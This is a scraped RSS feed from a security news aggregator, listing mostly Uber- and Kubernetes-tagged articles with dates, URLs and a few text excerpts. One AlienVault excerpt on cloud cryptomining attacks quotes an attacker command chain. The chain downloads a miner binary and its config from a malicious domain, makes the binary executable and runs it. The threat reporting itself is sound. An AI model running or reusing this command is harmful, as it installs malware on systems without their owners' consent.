This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-20T21:52:37+00:00 www.secnews.physaphae.fr Wired Threat Level - Security News 2019-10-25T12:00:00+00:00 https://www.wired.com/story/gadget-lab-podcast-428 www.secnews.physaphae.fr/article.php?IdArticle=1426129 False None Uber None Wired Threat Level - Security News 2019-10-25T11:00:00+00:00 https://www.wired.com/story/your-secret-uber-tipping-behavior-exposed www.secnews.physaphae.fr/article.php?IdArticle=1426021 False None Uber None Wired Threat Level - Security News 2019-10-24T11:00:00+00:00 https://www.wired.com/story/youtube-union www.secnews.physaphae.fr/article.php?IdArticle=1423847 False None Uber None TechRepublic - Security News US 2019-10-21T20:26:11+00:00 https://www.techrepublic.com/article/how-to-deploy-a-kubernetes-cluster-using-gcloud-command/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1418351 False None Uber None Wired Threat Level - Security News 2019-10-17T14:47:13+00:00 https://www.wired.com/story/showtime-uber-show www.secnews.physaphae.fr/article.php?IdArticle=1409311 False None Uber None Wired Threat Level - Security News 2019-10-16T13:00:00+00:00 https://www.wired.com/story/corporate-americas-second-war-with-the-rule-of-law www.secnews.physaphae.fr/article.php?IdArticle=1407184 False None Uber None Wired Threat Level - Security News 2019-10-16T11:00:00+00:00 https://www.wired.com/story/death-cars-greatly-exaggerated www.secnews.physaphae.fr/article.php?IdArticle=1406939 False None Uber None AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC Posted by: Ashley Graves Read full post        ]]> 2019-10-15T13:00:00+00:00 https://feeds.feedblitz.com/~/607808366/0/alienvaultotx~Security-monitoring-for-managed-cloud-Kubernetes www.secnews.physaphae.fr/article.php?IdArticle=1404811 False None Uber None Wired Threat Level - Security News 2019-10-14T15:00:00+00:00 https://www.wired.com/story/underwater-volcano-bubbles www.secnews.physaphae.fr/article.php?IdArticle=1402689 False None Uber None Adam Shostack - American Security Blog 2019-10-09T15:17:25+00:00 https://adam.shostack.org/blog/2019/10/quick-threat-model-links-october-2019/ www.secnews.physaphae.fr/article.php?IdArticle=1392754 False Threat Uber None TechRepublic - Security News US 2019-10-07T19:31:04+00:00 https://www.techrepublic.com/article/what-is-kubernetes/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1388986 False None Uber None TechRepublic - Security News US 2019-10-04T20:54:51+00:00 https://www.techrepublic.com/article/aws-billing-is-broken-and-kubernetes-wont-last-says-irreverent-economist-corey-quinn/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1381000 False None Uber None Wired Threat Level - Security News 2019-10-03T12:00:00+00:00 https://www.wired.com/story/stumbles-uber-wework-dont-mean-end-tech www.secnews.physaphae.fr/article.php?IdArticle=1378153 False None Uber 3.0000000000000000 Security Affairs - Blog Secu 2019-10-02T21:33:42+00:00 https://securityaffairs.co/wordpress/92051/data-breach/zendesk-2016-security-breach.html www.secnews.physaphae.fr/article.php?IdArticle=1376479 True Data Breach Uber None Bleeping Computer - Magazine Américain 2019-10-02T12:59:59+00:00 https://www.bleepingcomputer.com/news/security/zendesk-security-breach-may-impact-orgs-like-uber-slack-and-fcc/ www.secnews.physaphae.fr/article.php?IdArticle=1375998 False None Uber None TechRepublic - Security News US 2019-10-01T17:24:26+00:00 https://www.techrepublic.com/article/how-to-deploy-a-kubernetes-cluster-on-the-google-cloud-platform/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1374035 False None Uber None TechRepublic - Security News US 2019-09-30T12:58:35+00:00 https://www.techrepublic.com/article/sql-server-takes-a-turn-towards-kubernetes-and-big-data/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1371019 False None Uber None Wired Threat Level - Security News 2019-09-27T00:51:38+00:00 https://www.wired.com/story/ubers-new-features-focus-rider-safety www.secnews.physaphae.fr/article.php?IdArticle=1364237 False None Uber None TechRepublic - Security News US 2019-09-26T21:03:08+00:00 https://www.techrepublic.com/article/how-to-deploy-the-kubernetes-webui-with-microk8s/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1363845 False Tool Uber None The Last Watchdog - Blog Sécurité de Byron V Acohido 2019-09-23T08:46:59+00:00 https://www.lastwatchdog.com/new-tech-how-cryptographic-splitting-bakes-in-security-at-a-protect-the-data-itself-level/ www.secnews.physaphae.fr/article.php?IdArticle=1355563 False Data Breach Uber,Equifax,Yahoo None TechRepublic - Security News US 2019-09-18T15:11:12+00:00 https://www.techrepublic.com/article/how-to-deploy-a-kubernetes-cluster-on-ubuntu-server/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1343801 False None Uber None Wired Threat Level - Security News 2019-09-15T13:00:00+00:00 https://www.wired.com/story/new-electrics-new-laws-car-news www.secnews.physaphae.fr/article.php?IdArticle=1332810 False None Uber None Wired Threat Level - Security News 2019-09-13T17:12:59+00:00 https://www.wired.com/story/how-tech-firms-like-uber-hide-behind-the-platform-defense www.secnews.physaphae.fr/article.php?IdArticle=1325444 False None Uber None InformationSecurityBuzzNews - Site de News Securite Uber Account Takeover Vulnerability Discovered]]> 2019-09-12T13:27:01+00:00 https://www.informationsecuritybuzz.com/expert-comments/uber-account-takeover-vulnerability-discovered/ www.secnews.physaphae.fr/article.php?IdArticle=1322107 False Vulnerability Uber None Wired Threat Level - Security News 2019-09-12T11:00:00+00:00 https://www.wired.com/story/why-uber-still-call-drivers-contractors www.secnews.physaphae.fr/article.php?IdArticle=1321694 False None Uber None Wired Threat Level - Security News 2019-09-12T10:00:00+00:00 https://www.wired.com/story/wired25-festival-2019-announcement www.secnews.physaphae.fr/article.php?IdArticle=1321696 False None Uber None Wired Threat Level - Security News 2019-09-11T18:29:04+00:00 https://www.wired.com/story/california-gig-workers-become-employees www.secnews.physaphae.fr/article.php?IdArticle=1320298 False None Uber None TechRepublic - Security News US 2019-09-10T15:24:03+00:00 https://www.techrepublic.com/article/how-to-add-kubernetes-support-to-docker-desktop/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1317766 False None Uber None Wired Threat Level - Security News 2019-09-06T12:00:00+00:00 https://www.wired.com/story/gadget-lab-podcast-421 www.secnews.physaphae.fr/article.php?IdArticle=1310015 False None Uber 3.0000000000000000 TechRepublic - Security News US 2019-09-05T13:21:01+00:00 https://www.techrepublic.com/article/mobility-as-a-service-could-convert-car-drivers-to-bus-riders/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1307636 False None Uber None TechRepublic - Security News US 2019-09-05T10:00:01+00:00 https://www.techrepublic.com/article/why-red-hat-sees-knative-as-the-answer-to-kubernetes-orchestration/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1307327 False None Uber None Wired Threat Level - Security News 2019-09-04T01:20:00+00:00 https://www.wired.com/story/book-review-super-pumped-mike-isaac www.secnews.physaphae.fr/article.php?IdArticle=1304301 False None Uber None Wired Threat Level - Security News 2019-09-01T13:00:00+00:00 https://www.wired.com/story/a-tesla-security-bug-levandowski-indicted-and-more-car-news www.secnews.physaphae.fr/article.php?IdArticle=1298970 False None Uber 3.0000000000000000 Wired Threat Level - Security News 2019-08-30T11:00:00+00:00 https://www.wired.com/story/california-bill-uber-lyft-running-scared www.secnews.physaphae.fr/article.php?IdArticle=1295343 False None Uber None Wired Threat Level - Security News 2019-08-29T12:00:00+00:00 https://www.wired.com/story/anthony-levandowski-put-himself-center-industry www.secnews.physaphae.fr/article.php?IdArticle=1293141 False None Uber None Wired Threat Level - Security News 2019-08-29T11:00:00+00:00 https://www.wired.com/story/levandowskis-fate-turn-meaning-trade-secret www.secnews.physaphae.fr/article.php?IdArticle=1293036 False None Uber None Wired Threat Level - Security News 2019-08-27T19:38:05+00:00 https://www.wired.com/story/ex-uber-engineer-levandowski-charged-trade-secret-theft www.secnews.physaphae.fr/article.php?IdArticle=1288943 False None Uber None TechRepublic - Security News US 2019-08-26T14:58:01+00:00 https://www.techrepublic.com/article/struggling-to-move-workloads-to-the-cloud-vmwares-new-tech-may-be-the-perfect-on-ramp/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1286393 False None Uber 2.0000000000000000 SecurityWeek - Security News HTTP/2 implementation vulnerabilities that were disclosed earlier this month.  ]]> 2019-08-23T17:48:05+00:00 https://www.securityweek.com/kubernetes-patches-recent-http2-vulnerabilities www.secnews.physaphae.fr/article.php?IdArticle=1282000 False None Uber None Bleeping Computer - Magazine Américain 2019-08-20T11:15:02+00:00 https://www.bleepingcomputer.com/news/security/severe-flaws-in-kubernetes-expose-all-servers-to-dos-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=1274108 False None Uber None Wired Threat Level - Security News 2019-08-19T13:00:00+00:00 https://www.wired.com/story/ubers-dollar5-billion-loss-boeings-787-trouble-and-more-car-news www.secnews.physaphae.fr/article.php?IdArticle=1271478 False None Uber None Wired Threat Level - Security News 2019-08-16T12:00:00+00:00 https://www.wired.com/story/surprise-uber-and-lyft-dont-like-nycs-new-ride-hail-rules www.secnews.physaphae.fr/article.php?IdArticle=1266233 False None Uber None Wired Threat Level - Security News 2019-08-13T10:00:00+00:00 https://www.wired.com/story/how-many-uber-lyft-drivers-recalled-cars www.secnews.physaphae.fr/article.php?IdArticle=1259603 False None Uber None Wired Threat Level - Security News 2019-08-11T13:00:00+00:00 https://www.wired.com/story/ubers-big-loss-boeings-787-trouble-more-car-news www.secnews.physaphae.fr/article.php?IdArticle=1256707 False None Uber None Wired Threat Level - Security News 2019-08-09T01:14:00+00:00 https://www.wired.com/story/uber-lyft-suggest-cheap-rides-could-be-over www.secnews.physaphae.fr/article.php?IdArticle=1251835 False None Uber None TechRepublic - Security News US 2019-08-06T21:48:01+00:00 https://www.techrepublic.com/article/how-hot-is-kubernetes-even-traditional-banks-are-transforming-to-embrace-it/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1247035 False None Uber None Wired Threat Level - Security News 2019-08-03T11:00:00+00:00 https://www.wired.com/story/startup-tame-chaos-city-street-parking www.secnews.physaphae.fr/article.php?IdArticle=1240530 False None Uber None InformationSecurityBuzzNews - Site de News Securite Practicing Safe Containerisation]]> 2019-08-01T17:15:05+00:00 https://www.informationsecuritybuzz.com/articles/practicing-safe-containerisation/ www.secnews.physaphae.fr/article.php?IdArticle=1237408 False None Uber None SecurityWeek - Security News 2019-07-30T12:09:05+00:00 https://www.securityweek.com/security-top-concern-containerization-gathers-pace www.secnews.physaphae.fr/article.php?IdArticle=1235472 False None Uber None UnderNews - Site de news "pirate" francais Un mot de passe est un peu comme une brosse à dents : il doit être bon, il ne se partage pas et se remplace chaque trimestre, selon Christophe Auberger, Director System Engineering, Fortinet.]]> 2019-07-26T07:19:00+00:00 https://www.undernews.fr/authentification-biometrie/securite-des-mots-de-passe-6-bonnes-pratiques-qui-font-la-difference.html www.secnews.physaphae.fr/article.php?IdArticle=1224448 False None Uber None ZD Net - Magazine Info 2019-07-23T12:36:00+00:00 https://www.zdnet.com/article/uber-hit-by-critical-vulnerability-in-palo-alto-vpn-solution/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=1219998 False Vulnerability Uber None TechRepublic - Security News US 2019-07-16T13:12:01+00:00 https://www.techrepublic.com/article/developers-build-cloud-native-apps-for-kubernetes-faster-with-these-open-source-ibm-tools/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1208140 False None Uber None Wired Threat Level - Security News 2019-07-11T13:00:00+00:00 https://www.wired.com/story/blitzscaling-is-choking-innovation www.secnews.physaphae.fr/article.php?IdArticle=1200074 False None Uber None Wired Threat Level - Security News 2019-07-07T11:00:00+00:00 https://www.wired.com/story/public-transit-agencies-rewards-programs www.secnews.physaphae.fr/article.php?IdArticle=1191520 False None Uber 2.0000000000000000 Wired Threat Level - Security News 2019-06-29T11:00:00+00:00 https://www.wired.com/story/transit-agencies-turn-uber-last-mile www.secnews.physaphae.fr/article.php?IdArticle=1179145 False None Uber None Wired Threat Level - Security News 2019-06-27T21:04:05+00:00 https://www.wired.com/story/depth-of-field-etika www.secnews.physaphae.fr/article.php?IdArticle=1177146 False None Uber None ZD Net - Magazine Info 2019-06-26T20:51:02+00:00 https://www.zdnet.com/article/kubernetes-cli-tool-security-flaw-lets-attackers-run-code-on-host-machine/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=1175495 False Tool,Guideline Uber None Wired Threat Level - Security News 2019-06-26T17:08:01+00:00 https://www.wired.com/story/youtube-flexing-psychology www.secnews.physaphae.fr/article.php?IdArticle=1175151 False None Uber None Bleeping Computer - Magazine Américain 2019-06-20T16:30:04+00:00 https://www.bleepingcomputer.com/news/gaming/epic-games-sues-youtuber-cbv-for-selling-fortnite-cheats/ www.secnews.physaphae.fr/article.php?IdArticle=1166034 False None Uber None SecurityWeek - Security News MongoDB document-based database management product, has announced the latest version, 4.2. The primary new features are distributed transactions, an updated Kubernetes Operator, and client-side field level encryption. ]]> 2019-06-20T11:00:04+00:00 https://www.securityweek.com/mongodb-introduces-client-side-field-level-encryption-aid-compliance www.secnews.physaphae.fr/article.php?IdArticle=1166430 False None Uber None TechRepublic - Security News US 2019-06-19T04:00:00+00:00 https://www.techrepublic.com/article/how-to-get-a-single-node-kubernetes-deployment-up-in-seconds/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1163162 False None Uber None Wired Threat Level - Security News 2019-06-18T17:03:04+00:00 https://www.wired.com/story/youtube-natural-hair www.secnews.physaphae.fr/article.php?IdArticle=1162601 False None Uber None Wired Threat Level - Security News 2019-06-15T11:00:00+00:00 https://www.wired.com/story/new-york-city-flexes-extending-cap-uber-lyft www.secnews.physaphae.fr/article.php?IdArticle=1156631 False None Uber None Wired Threat Level - Security News 2019-06-07T22:28:03+00:00 https://www.wired.com/story/lyfts-sues-san-francisco-bike-share-motivate www.secnews.physaphae.fr/article.php?IdArticle=1145436 False None Uber None Wired Threat Level - Security News 2019-06-01T13:00:00+00:00 https://www.wired.com/2019/06/youtuber-quest-save-rpg www.secnews.physaphae.fr/article.php?IdArticle=1135303 False None Uber None Wired Threat Level - Security News 2019-05-31T12:00:00+00:00 https://www.wired.com/story/generative-music-apps www.secnews.physaphae.fr/article.php?IdArticle=1133907 False None Uber None Wired Threat Level - Security News 2019-05-30T22:44:01+00:00 https://www.wired.com/story/california-lawmakers-move-protect-gig-economy-workers www.secnews.physaphae.fr/article.php?IdArticle=1133132 False None Uber None Malwarebytes Labs - MalwarebytesLabs 2019-05-29T18:51:04+00:00 https://blog.malwarebytes.com/privacy-2/2019/05/nists-privacy-framework-lets-privacy-tell-its-own-story/ www.secnews.physaphae.fr/article.php?IdArticle=1131516 False None Uber None Wired Threat Level - Security News 2019-05-24T13:00:00+00:00 https://www.wired.com/story/how-to-solve-a-rubiks-cube-in-5-seconds-or-less www.secnews.physaphae.fr/article.php?IdArticle=1123141 False None Uber None Checkpoint - Fabricant Materiel Securite 2019-05-22T13:00:03+00:00 http://blog.checkpoint.com/2019/05/22/cloudguard-cloud-data-iaas-supports-kubernetes-container-security-cyber/ www.secnews.physaphae.fr/article.php?IdArticle=1119910 False None Uber None TechRepublic - Security News US 2019-05-21T18:13:00+00:00 https://www.techrepublic.com/article/capital-ones-critical-stack-platform-aims-to-secure-cloud-migration-and-deployment/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1118470 False None Uber None IT Security Guru - Blog Sécurité 2019-05-21T14:40:05+00:00 https://www.itsecurityguru.org/2019/05/21/gigamon-launches-new-tool-to-shine-light-on-digital-apps-within-the-enterprise/ www.secnews.physaphae.fr/article.php?IdArticle=1118107 False Tool Uber None TechRepublic - Security News US 2019-05-15T12:51:00+00:00 https://www.techrepublic.com/article/ulia-kubernetes-and-hadoop-among-the-20-fastest-growing-freelancer-skills/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1108365 False None Uber None Wired Threat Level - Security News 2019-05-13T11:00:00+00:00 https://www.wired.com/story/why-uber-fighting-cities-data-about-scooters www.secnews.physaphae.fr/article.php?IdArticle=1104971 False None Uber 4.0000000000000000 Wired Threat Level - Security News 2019-05-12T13:00:00+00:00 https://www.wired.com/story/ubers-underwhelming-ipo-lyft-earnings-more-car-news www.secnews.physaphae.fr/article.php?IdArticle=1103982 False None Uber None Wired Threat Level - Security News 2019-05-10T23:15:02+00:00 https://www.wired.com/story/uber-ipo-facebook-breakup-democratic-candidates-climate-change www.secnews.physaphae.fr/article.php?IdArticle=1102912 False None Uber None Wired Threat Level - Security News 2019-05-10T13:00:00+00:00 https://www.wired.com/story/bet-uber-bet-self-driving www.secnews.physaphae.fr/article.php?IdArticle=1102180 False None Uber None Wired Threat Level - Security News 2019-05-09T01:00:05+00:00 https://www.wired.com/story/eve-ubers-ipo-ride-hail-drivers-stage-protests www.secnews.physaphae.fr/article.php?IdArticle=1099585 False None Uber None Bleeping Computer - Magazine Américain 2019-05-08T03:10:00+00:00 https://www.bleepingcomputer.com/news/security/scammers-try-to-trick-youtubers-into-giving-up-password/ www.secnews.physaphae.fr/article.php?IdArticle=1098317 False None Uber None TechRepublic - Security News US 2019-05-07T17:40:00+00:00 https://www.techrepublic.com/article/in-a-kubernetes-vs-aws-world-red-hat-may-hold-the-edge/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1098008 False None Uber 2.0000000000000000 Wired Threat Level - Security News 2019-05-05T13:00:00+00:00 https://www.wired.com/story/tesla-raises-money-drones-get-certified-more-car-news www.secnews.physaphae.fr/article.php?IdArticle=1097501 False None Tesla,Uber None Malwarebytes Labs - MalwarebytesLabs Here are Labs' top six takeaways from our data privacy and cybersecurity law series on corporate data privacy compliance. From emerging startups to burgeoning enterprises, these rules help not just with legal liability, but also user trust. Categories: Privacy Security world Tags: AppleCalifornia Online Privacy Protection Actcybersecurity lawcybersecurity lawsdata breach notificationdata breach notification lawData privacydata privacy compliancedata privacy lawdata privacy lawsdata privacy legislationgdprGeneral Data Protection RegulationHelix DNAmozillaonline privacypersonal datapersonal informationpersonally identifiable informationprivacy policyprotonmailsignalUberuser privacywhatsapp (Read more...) ]]> 2019-05-03T15:00:00+00:00 https://blog.malwarebytes.com/security-world/2019/05/the-top-six-takeaways-for-corporate-data-privacy-compliance/ www.secnews.physaphae.fr/article.php?IdArticle=1097472 False None Uber None Wired Threat Level - Security News 2019-04-19T19:27:04+00:00 https://www.wired.com/story/uber-recruits-some-rich-friends-drive-autonomous-cars www.secnews.physaphae.fr/article.php?IdArticle=1095107 False None Uber None Wired Threat Level - Security News 2019-04-12T20:49:02+00:00 https://www.wired.com/story/gadget-lab-podcast-402 www.secnews.physaphae.fr/article.php?IdArticle=1093893 False None Uber None Wired Threat Level - Security News 2019-04-12T00:54:03+00:00 https://www.wired.com/story/ubers-losing-less-moneybut-growing-less-too www.secnews.physaphae.fr/article.php?IdArticle=1093147 False None Uber None TechRepublic - Security News US 2019-04-09T19:25:02+00:00 https://www.techrepublic.com/article/google-cloud-platform-launches-cloud-run-aims-to-bring-enterprise-workloads-to-serverless-kubernetes/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1091696 False None Uber 4.0000000000000000 TechRepublic - Security News US 2019-04-09T13:52:03+00:00 https://www.techrepublic.com/article/uber-launches-free-ride-voucher-program-to-help-businesses-attract-and-retain-customers/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1091704 False None Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC What is a container? A container is an evolution of virtualization. Traditionally, virtualization requires entire “guest operating systems” to be deployed on a hypervisor or host operating system. This was an amazing breakthrough as it blew up the traditional relationship between hardware and operating systems, enabling the deployment of different application building blocks in different VMs on the same or different hardware. Thus it created new ways to build and scale applications. This transition changed how we think about compute resources, moving us from “pets” to “cattle”. Yet each VM carried along with it an entire operating system worth of overhead. Containers fix this problem by virtualizing only the application and all the associated dependencies it has (shared libraries, file systems, etc.), allowing many more containers to ride on a single operating system. This makes them much, much more efficient. They also have the advantage of being portable across operating systems; they are truly platform agnostic. Docker security and Kubernetes security are simply the most well known There are many kinds of containers, Docker is only the most popular. In addition to the containers themselves, most deployments benefit from orchestration and management tools. Kubernetes is the most well-known of these, and Swarm and Mesos are others. These tools handle all aspects of the container lifecycle, helping build consistent container images, deploy them into production, monitor their performance, and decommission them when the time comes. Easier, safer: benefits of containers, as they relate to security The isolation provided by containers enables us to better scale and modularize our applications into smaller pieces. But what does it do for our security? LOTS! But containers don’t fundamentally change anything we need to do in the threat detection and response area. Containers make it extremely easy to reduce our attack surface area. In fact, Docker containers use a “Docker file” that defines many things, including what IPs, ports, and protocols the container can use for communication. Because containers are intended to be used for modular workloads, it isn’t difficult to determine what these ports and protocols should be, making it simple to realize the idea of providing only essential access while keeping things simple Another key security advantage of containers is, of course, the isolation they provide. If the application inside your container falls victim to an attack, the attacker will find themselves in a very restricted area with only a small part of the application code and user data present. In fact, management connectivity via SSH and the like is often unnecessary in containers, making them even harder to access remotely. Of course, lateral movement or privilege escalation may be possible when vulnerabilities are present. But even if containers are compromised, they have huge advantages. Because they are designed to be ephemerial, remediation of an infected container can be as simple as blowing it]]> 2019-04-08T13:00:00+00:00 https://feeds.feedblitz.com/~/600389666/0/alienvault-blogs~Understanding-container-security www.secnews.physaphae.fr/article.php?IdArticle=1091676 False None Uber None Wired Threat Level - Security News 2019-04-03T17:34:03+00:00 https://www.wired.com/story/potential-investors-lyft-uber-buyer-beware www.secnews.physaphae.fr/article.php?IdArticle=1087593 False Guideline Uber None IT Security Guru - Blog Sécurité 2019-04-03T09:35:03+00:00 https://www.itsecurityguru.org/2019/04/03/fans-of-swedish-youtuber-pewdiepie-spread-malware-to-increase-channel-subscriptions/ www.secnews.physaphae.fr/article.php?IdArticle=1087316 False Ransomware,Malware Uber 4.0000000000000000 taosecurity - Blog Sécurité Chinois Last week I attended my first OSSEC conference. I first blogged about OSSEC in 2007, and wrote other posts about it in the following years.OSSEC is a host-based intrusion detection and log analysis system with correlation and active response features. It is cross-platform, such that I can run it on my Windows and Linux systems. The moving force behind the conference was a company local to me called Atomicorp.In brief, I really enjoyed this one-day event. (I had planned to attend the workshop on the second day but my schedule did not cooperate.) The talks were almost uniformly excellent and informative. I even had a chance to talk jiu-jitsu with OSSEC creator Daniel Cid, who despite hurting his leg managed to travel across the country to deliver the keynote.I'd like to share a few highlights from my notes.First, I had been worried that OSSEC was in some ways dead. I saw that the Security Onion project had replaced OSSEC with a fork called Wazuh, which I learned is apparently pronounced "wazoo." To my delight, I learned OSSEC is decidedly not dead, and that Wazuh has been suffering stability problems. OSSEC has a lot of interesting development ahead of it, which you can track on their Github repo.For example, the development roadmap includes eliminating Logstash from the pipeline used by many OSSEC users. OSSEC would feed directly into Elasticsearch. One speaker noted that Logstash has a 1.7 GB memory footprint, which astounded me.On a related note, the OSSEC team is planning to create a new Web console, with a design goal to have it run in an "AWS t2.micro" instance. The team noted that instance offers 2 GB memory, which doesn't match what AWS says. Perhaps they meant t2.micro and 1 GB memory, or t2.small with 2 GB memory. I think they mean t2.micro with 1 GB RAM, as that is the free tier. Either way, I'm excited to see this later in 2019.Second, I thought the presentation by security personnel from USA Today offered an interesting insight. One design goal they had for monitoring their Google Cloud Platform (GCP) was to not install OSSEC on every container or on Kubernetes worker nodes. Several times during the conference, speakers noted that the transient nature of cloud infrastructure is directly antithetical to standard OSSEC usage, whereby OSSEC is installed on servers with long uptime and years of service. Instead, USA Today used OSSEC to monitor HTTP logs from the GCP load balancer, logs from Google Kubernetes Engine, and monitored processes by watching output from successive kubectl invocations.Third, a speaker from Red Hat brought my attention to an aspect of containers that I had not considered. Docker and containers had made software testing and deployment a lot easier for everyone. However, those who provide containers have effectively become Linux distribution maintainers. In other words, who is responsible when a security or configuration vulnerability in a Linux component is discovered? Will the container maintainers be responsive?Another speaker emphasized the difference between "security of the cloud," offered by cloud providers, and "security in the cloud," which is supposed to be the customer\]]> 2019-03-28T16:40:01+00:00 https://taosecurity.blogspot.com/2019/03/thoughts-on-ossec-con-2019.html www.secnews.physaphae.fr/article.php?IdArticle=1085953 False Vulnerability Uber None TechRepublic - Security News US 2019-03-27T15:42:01+00:00 https://www.techrepublic.com/article/container-adoption-increasing-as-businesses-increasingly-rely-on-multicloud-deployments/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1083672 False None Uber None Security Affairs - Blog Secu 2019-03-25T09:49:05+00:00 https://securityaffairs.co/wordpress/82843/malware/pewdiepie-ransomware.html www.secnews.physaphae.fr/article.php?IdArticle=1080730 False Ransomware Uber None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2019-03-20T15:05:01+00:00 https://threatpost.com/uber-surfcam-spyware-australia/142977/ www.secnews.physaphae.fr/article.php?IdArticle=1073349 False None Uber None AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC compromise container management platforms. We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request. RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification. Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves. Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns. Control Panel Exploitation We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code. In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP.  This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP.  VestaCP users provided details on how their installations were compromised. In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency. pkill -f xmrig; wget -O /tmp/gcc http://xaxaxa[.]eu/gcc; chmod +x gcc; wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json; /tmp/gcc -c /tmp/config_1.json; Lastly, the ]]> 2019-03-14T14:55:00+00:00 https://feeds.feedblitz.com/~/599567166/0/alienvault-blogs~Making-it-Rain-Cryptocurrency-Mining-Attacks-in-the-Cloud www.secnews.physaphae.fr/article.php?IdArticle=1069807 False Guideline Tesla,Uber None Wired Threat Level - Security News 2019-03-13T22:18:00+00:00 https://www.wired.com/story/colleges-need-influencers-but-do-influencers-need-college www.secnews.physaphae.fr/article.php?IdArticle=1068528 False None Uber None Wired Threat Level - Security News 2019-03-06T19:47:02+00:00 https://www.wired.com/story/waymo-selling-lidar-fought-uber-protect www.secnews.physaphae.fr/article.php?IdArticle=1056770 False None Uber None Wired Threat Level - Security News 2019-03-01T22:50:03+00:00 https://www.wired.com/story/lyft-ipo-filing-ridership-revenue-losses-costs-charts www.secnews.physaphae.fr/article.php?IdArticle=1048656 False None Uber None TechRepublic - Security News US 2019-02-27T14:02:01+00:00 https://www.techrepublic.com/article/the-10-most-popular-container-tools-for-businesses/#ftag=RSS56d97e7 www.secnews.physaphae.fr/article.php?IdArticle=1044787 False None Uber None Wired Threat Level - Security News 2019-02-27T12:00:00+00:00 https://www.wired.com/story/how-data-helps-deliver-your-dinner-on-time-warm www.secnews.physaphae.fr/article.php?IdArticle=1044526 False None Uber 5.0000000000000000